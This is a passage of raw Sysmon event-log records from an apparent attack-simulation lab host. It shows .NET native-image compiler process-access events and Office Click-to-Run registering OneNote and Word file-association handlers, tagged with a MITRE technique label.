14:57:43.920{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE7-607E-360D-00000000BB01}6080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075923Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:43.905{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBE7-607E-360D-00000000BB01}6080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075922Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:43.905{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE7-607E-360D-00000000BB01}6080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000075921Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.889{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\OneNoteDesktop.URL.16\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" /hyperlink "%%1" 13241300x800000000000000075920Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.873{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\OneNoteDesktop\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" /hyperlink "%%1" 13241300x800000000000000075919Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.858{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\OneNote.URL.16\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" /hyperlink "%%1" 10341000x800000000000000075918Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:43.858{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE7-607E-350D-00000000BB01}6184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000075917Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.842{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\OneNote.Notebook.1\shell\OpenAsReadOnly\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" "%%1" 13241300x800000000000000075916Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.842{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\OneNote.Notebook.1\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" "%%1" 13241300x800000000000000075915Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.842{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\OneNote.Notebook.1\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" "%%1" 10341000x800000000000000075914Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:43.827{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBE7-607E-350D-00000000BB01}6184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075913Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:43.827{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE7-607E-350D-00000000BB01}6184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000075912Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.811{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\OneNote.Folder.1\shell\OpenAsReadOnly\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" "%%1" 13241300x800000000000000075911Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\OneNote.Folder.1\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" "%%1" 13241300x800000000000000075910Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\OneNote.Folder.1\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" "%%1" 10341000x800000000000000075909Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:43.795{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE7-607E-340D-00000000BB01}2940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075908Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:43.780{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBE7-607E-340D-00000000BB01}2940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075907Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:43.780{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE7-607E-340D-00000000BB01}2940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000075906Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.780{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\OneNote\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" /hyperlink "%%1" 13241300x800000000000000075905Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.764{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\OneNote.TableOfContents.12\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" /navigate "%%1" 13241300x800000000000000075904Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.748{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\OneNote.TableOfContents\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" /navigate "%%1" 13241300x800000000000000075903Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.748{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\OneNote.Package\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" "%%1" 10341000x800000000000000075902Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:43.733{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE7-607E-330D-00000000BB01}5424C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000075901Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.733{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\OneNote.Section.1\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" /print "%%1" 13241300x800000000000000075900Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.733{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\OneNote.Section.1\shell\OpenAsReadOnly\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" "%%1" 13241300x800000000000000075899Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.717{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\OneNote.Section.1\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" "%%1" 13241300x800000000000000075898Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.717{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\OneNote.Section.1\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" /new "%%1" 13241300x800000000000000075897Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.717{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\OneNote.Section.1\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" "%%1" 10341000x800000000000000075896Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:43.717{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBE7-607E-330D-00000000BB01}5424C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075895Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:43.717{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE7-607E-330D-00000000BB01}5424C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000075894Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:43.670{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE7-607E-320D-00000000BB01}6676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075893Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:43.655{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBE7-607E-320D-00000000BB01}6676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075892Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:43.655{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE7-607E-320D-00000000BB01}6676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000075891Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.623{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.UriLink.16\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\protocolhandler.exe "%%1" 10341000x800000000000000075890Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:43.623{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE7-607E-310D-00000000BB01}1460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000075889Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.608{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\ms-word\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\protocolhandler.exe "%%1" 10341000x800000000000000075888Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:43.592{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBE7-607E-310D-00000000BB01}1460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075887Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 